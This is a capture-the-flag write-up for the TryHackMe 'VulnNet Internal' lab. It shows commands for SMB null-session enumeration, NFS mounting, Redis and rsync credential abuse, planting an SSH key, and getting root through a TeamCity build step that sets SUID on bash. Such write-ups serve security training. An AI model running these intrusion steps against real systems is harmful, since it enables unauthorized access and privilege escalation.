TryHackMe Vulnet Internal - Writeup
Vulnet is an easy/medium difficulty TryHackMe machine.
Challenge brief
VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings.
There are four flags that need to be submitted in order to complete the challenge:
- Service Flag
- Internal Flag
- User Flag
- Root Flag
Nmap Scan
nmap -p- -sS -T5 --min-rate 1000 --max-retries=3 --open -vvv -n -Pn -oG allPorts
nmap -sC -sV -p22,111,139,445,873,2049,6379,40031,40423,44823,53943 -oN targeted
Port 139 & 445 - SMB
Let’s enumarate with enum4linux
enum4linux - a
| Share Enumeration on |
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
shares Disk VulnNet Business Shares
IPC$ IPC IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on
//$ Mapping: DENIED, Listing: N/A
// Mapping: OK, Listing: OK
//$ [E] Can not understand response:
| Users on via RID cycling (RIDS: 500-550,1000-1050) |
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1569020563-4280465252-527208056
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-1569020563-4280465252-527208056 and logon username '', password ''
S-1-5-21-1569020563-4280465252-527208056-513 VULNNET-INTERNAL\None (Domain Group)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\sys-internal (Local User)
Let’s access to //
with smbclient using a null session.
Inside /tmp we will get the services.txt flag
$ cat services.txt
Port 2049 - nfs_acl
Port 2049 is open and noticed that there was a lot of output for port 111. I can see in the output for port 111, that the service NFS was present in the output. This indicates that I might be able to list and download (and maybe upload) files.
More about NFS:
mkdir /tmp/infosec
mount -t nfs /tmp/infosec
Port 6379 - Redis
Port 6379 is open, and now we have a password.
requirepass "B65Hx562...."
More about Redis:
redis-cli -h
AUTH B65Hx562....
keys *
GET "internal flag"
LRANGE "authlist" 0 100
Port 873 - Rsync
In the “authlist” key, we found a base64 encoded value, when decoded gives us the credentials for the rsync service.
More about Rsync:
nc -vn 873
@RSYNCD: 31.0
rsync rsync://rsync-connect@
rsync rsync://rsync-connect@
rsync rsync://rsync-connect@ .
Let’s get a shell
ssh-keygen -o
rsync -av rsync://rsync-connect@
ssh -i id_rsa sys-internal@
I now have a SSH access to the target machine.
Root Privilege Escalation - TeamCity
More about TeamCity:
ssh -L 8111: -i id_rsa sys-internal@
Taking a look into the server, inside /TeamCity/logs
there is a file called catalina.out
, there we can find the token to log in a super admin.
- Create a project
- Create a build configuration
- Search for build steps
- New build step (command line)
- script: `chmod +s /bin/bash`
- Run!